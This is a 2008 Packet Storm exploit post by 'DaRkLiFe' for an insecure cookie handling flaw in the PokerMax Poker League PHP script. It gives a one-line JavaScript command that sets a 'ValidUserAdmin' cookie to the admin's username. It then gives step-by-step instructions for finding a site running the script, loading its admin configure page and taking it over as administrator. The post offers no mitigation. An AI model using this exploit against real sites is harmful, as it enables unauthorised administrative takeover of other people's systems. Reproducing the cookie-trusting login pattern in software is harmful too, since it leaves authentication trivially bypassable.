pokermax-cookie.txt

2008-10-17T00:00:00
ID PACKETSTORM:71001
Type packetstorm
Reporter DaRkLiFe
Modified 2008-10-17T00:00:00

Description

                                        
                                            `**************************************************************************************  
  
Author : DaRkLiFe  
Greetz : str0ke & S.W.A.T. & funkys0ul  
  
**************************************************************************************  
Script :  
  
PokerMax Poker League Insecure Cookie Handling Vulnerability  
  
Download:  
  
http://www.stevedawson.com/downloads/pokerleague.zip  
**************************************************************************************  
  
Exploit :  
  
javascript:document.cookie = "ValidUserAdmin=admin";  
  
**here "admin" refers to username of administrator on site  
  
default username is "admin" given after installation of site  
  
but if it is changed u can easily find out username of admin and then   
substitute it in place of "admin"  
**************************************************************************************  
  
Instructions :  
  
Find the site running on this script .  
  
Go to http://site.com/pokerleague/pokeradmin/configure.php  
  
It will ask for login. Now in url tab run the exploit command  
  
Then return back to http://site.com/pokerleague/pokeradmin/configure.php  
  
Now u should be loggedin as admin and change the thing into what you want .  
  
**************************************************************************************  
  
THANKS ! GREETZ ! HAPPY DIWALI !  
**************************************************************************************  
  
  
`